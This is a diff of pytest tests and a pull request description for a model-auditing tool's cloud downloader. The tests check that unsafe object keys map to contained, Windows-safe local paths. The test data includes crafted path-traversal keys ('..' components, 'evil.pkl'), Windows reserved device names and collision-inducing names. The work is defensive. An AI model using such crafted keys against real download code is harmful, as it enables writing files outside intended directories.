+    assert ntpath.normcase(lower.name) != ntpath.normcase(upper.name)
+
+
+def test_build_safe_local_path_distinguishes_safe_case_only_native_keys(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+
+    lower = _build_safe_local_path(base_url, f"{base_url}/model.pkl", tmp_path)
+    upper = _build_safe_local_path(base_url, f"{base_url}/Model.pkl", tmp_path)
+
+    assert lower == tmp_path / "model.pkl"
+    assert upper.name == "Model.pkl"
+    assert upper.parent.parent == tmp_path
+    assert upper.parent.name.startswith("~")
+    assert ntpath.normcase(str(lower.relative_to(tmp_path))) != ntpath.normcase(str(upper.relative_to(tmp_path)))
+
+
+def test_build_safe_local_path_reserves_generated_identity_namespace(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+
+    transformed = _build_safe_local_path(base_url, f"{base_url}/Model.pkl", tmp_path)
+    generated_identity = transformed.parent.name.removeprefix("~")
+    crafted = _build_safe_local_path(base_url, f"{base_url}/model~{generated_identity}.pkl", tmp_path)
+
+    assert crafted.name == f"model~{generated_identity}.pkl"
+    assert crafted.parent.name.startswith("~")
+    assert crafted.parent != transformed.parent
+    assert ntpath.normcase(str(transformed.relative_to(tmp_path))) != ntpath.normcase(
+        str(crafted.relative_to(tmp_path))
+    )
+
+
+def test_build_safe_local_path_preserves_manifest_basename_and_scanning(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+    local_path = _build_safe_local_path(base_url, f"{base_url}/Model.json", tmp_path)
+    local_path.parent.mkdir(parents=True)
+    local_path.write_text(json.dumps({"model_name": "blocked-model"}), encoding="utf-8")
+
+    assert local_path.name == "Model.json"
+    assert local_path.parent.name.startswith("~")
+    assert ManifestScanner.can_handle(str(local_path)) is True
+
+    result = ManifestScanner(config={"blacklist_patterns": ["blocked"]}).scan(str(local_path))
+
+    assert any(check.status.value == "failed" for check in result.checks)
+    assert any("Blacklisted term" in issue.message for issue in result.issues)
+
+
+def test_build_safe_local_path_bounds_encoded_native_components(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+    shared_prefix = "%?" * 50
+
+    first = _build_safe_local_path(base_url, f"{base_url}/{shared_prefix}one.pkl", tmp_path)
+    second = _build_safe_local_path(base_url, f"{base_url}/{shared_prefix}two.pkl", tmp_path)
+
+    assert len(first.name.encode("utf-8")) <= 240
+    assert len(second.name.encode("utf-8")) <= 240
+    assert first.suffix == ".pkl"
+    assert second.suffix == ".pkl"
+    assert first != second
+
+
+def test_build_safe_local_path_preserves_windows_safe_name(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+
+    assert _build_safe_local_path(base_url, f"{base_url}/model.pkl", tmp_path) == tmp_path / "model.pkl"
+
+
+def test_build_safe_local_path_encodes_windows_reserved_name(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+
+    local_path = _build_safe_local_path(base_url, f"{base_url}/CON.pkl", tmp_path)
+
+    assert local_path.parent == tmp_path
+    assert local_path.name.startswith("%43ON~")
+    assert local_path.suffix == ".pkl"
+    assert local_path.stem.casefold() != "con"
+
+
+@pytest.mark.parametrize(
+    "reserved_name",
+    ["conin$.pkl", "conout$.pkl", "COM\u00b9", "COM\u00b2.txt", "LPT\u00b3.pkl", "aux .txt"],
+)
+def test_build_safe_local_path_encodes_windows_console_device_name(
+    tmp_path: Path,
+    reserved_name: str,
+) -> None:
+    base_url = "s3://bucket/models"
+
+    local_path = _build_safe_local_path(base_url, f"{base_url}/{reserved_name}", tmp_path)
+
+    assert local_path.parent == tmp_path
+    assert local_path.name != reserved_name
+    assert local_path.name.startswith("%")
+
+
+def test_build_safe_local_path_encodes_unpaired_surrogate(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+
+    local_path = _build_safe_local_path(base_url, f"{base_url}/bad\ud800.pkl", tmp_path)
+    local_path.write_bytes(b"model")
+
+    assert local_path.read_bytes() == b"model"
+    assert "\ud800" not in local_path.name
+    assert local_path.name.startswith("bad%ED%A0%80~")
+    assert local_path.suffix == ".pkl"
 
 
 @patch("modelaudit.utils.sources.cloud_storage.analyze_cloud_target", new_callable=AsyncMock)
@@ -3437,7 +3810,7 @@ class TestCloudPathSecurity:
 
     @patch("modelaudit.utils.sources.cloud_storage.analyze_cloud_target", new_callable=AsyncMock)
     @patch("fsspec.filesystem")
-    def test_download_rejects_path_traversal(
+    def test_download_encodes_dot_components_as_object_key_text(
         self,
         mock_fs_class: MagicMock,
         mock_analyze: AsyncMock,
@@ -3445,6 +3818,7 @@ class TestCloudPathSecurity:
     ) -> None:
         fs = make_fs_mock()
         fs.info.return_value = {}
+        fs.get.side_effect = lambda _src, dst: Path(dst).write_bytes(b"data")
         mock_fs_class.return_value = fs
 
         mock_analyze.return_value = {
@@ -3463,16 +3837,19 @@ class TestCloudPathSecurity:
             ],
         }
 
-        with pytest.raises(ValueError, match="Path traversal attempt detected"):
-            download_from_cloud(
-                "s3://bucket/models",
-                cache_dir=tmp_path,
-                use_cache=False,
-                selective=False,
-                show_progress=False,
-            )
+        result = download_from_cloud(
+            "s3://bucket/models",
+            cache_dir=tmp_path,
+            use_cache=False,
+            selective=False,
+            show_progress=False,
+        )
 
-        fs.get.assert_not_called()
+        destination = Path(fs.get.call_args.args[1])
+        assert result == tmp_path
+        assert destination.is_relative_to(tmp_path)
+        assert ".." not in destination.relative_to(tmp_path).parts
+        assert destination.name == "evil.pkl"
 
     @patch("modelaudit.utils.sources.cloud_storage.analyze_cloud_target", new_callable=AsyncMock)
     @patch("fsspec.filesystem")
@@ -3747,7 +4124,7 @@ class TestCloudPathSecurity:
 
     @patch("modelaudit.utils.sources.cloud_storage.analyze_cloud_target", new_callable=AsyncMock)
     @patch("fsspec.filesystem")
-    def test_streaming_download_rejects_path_traversal(
+    def test_streaming_download_encodes_dot_components_as_object_key_text(
         self,
         mock_fs_class: MagicMock,
         mock_analyze: AsyncMock,
@@ -3771,16 +4148,18 @@ class TestCloudPathSecurity:
             ],
         }
 
-        with pytest.raises(ValueError, match="Path traversal attempt detected"):
-            list(
-                download_from_cloud_streaming(
-                    "s3://bucket/models",
-                    show_progress=False,
-                    selective=False,
-                )
+        downloads = list(
+            download_from_cloud_streaming(
+                "s3://bucket/models",
+                show_progress=False,
+                selective=False,
             )
+        )
 
-        fs.get.assert_not_called()
+        destination = Path(fs.get.call_args.args[1])
+        assert len(downloads) == 1
+        assert ".." not in destination.parts
+        assert destination.name == "evil.pkl"
 
     @patch("modelaudit.utils.sources.cloud_storage.analyze_cloud_target", new_callable=AsyncMock)
     @patch("fsspec.filesystem")


### PR DESCRIPTION
## Summary

- use credential-free cloud routing probe names while preserving only genuine object-key suffixes
- encode unsafe cloud key components into deterministic, bounded, Windows-safe local paths
- preserve case/non-ASCII identity, scanner-significant leaf basenames, and canonical framework directories such as `assets/` and `variables/`
- distinguish empty components and file-versus-prefix pairs without renaming ordinary model hierarchies
- retain atomic cloud downloads, symlink-swap containment, cache preflight, and destination alias checks from #1541
- keep ExecuTorch ZIP snapshots seekable on Python 3.10 with `BytesIO` through 8 MiB and `TemporaryFile` above it
- align renamed Flax fail-closed regressions with the current bounded-stream diagnostic and metadata

## Security behavior

Cloud path mapping covers case-insensitive and Unicode-normalization collisions, generated identity namespace collisions, empty components, Windows console device names, unpaired surrogates, backslash-bearing keys, and object stores that contain both `a.pkl` and `a.pkl/b.pkl`.

Prefix disambiguation is planned across the selected object set, while residual destination aliases still fail closed. Absolute provider listings outside the requested target are rejected; traversal-like object-key text is encoded under the download root and remains scannable. Downloads commit through same-directory temporary files with parent and final-component symlink checks before replacement.

Routing probes reject delimiter-tainted pseudo-suffixes while retaining real final suffixes. Scanner-significant leaves such as `Model.json` retain their basename under an isolated identity directory.

## Validation

- exact published head: `76d909f48d0c002e28f0c9544d61e240d86d0d43`
- exact published tree: `2b1bffe2e8aaad209f028d5c0727205819e8ab86`
- refreshed onto `main` at `17efed9c294b55d89344ade0a714aedfa6f05e9e`
- cloud storage: `388 passed`
- ExecuTorch + exact Flax regressions: `111 passed`
- Ruff format/check: clean
- mypy on all six associated Python files: clean
- `git diff --check`: clean

All four inline review threads are resolved.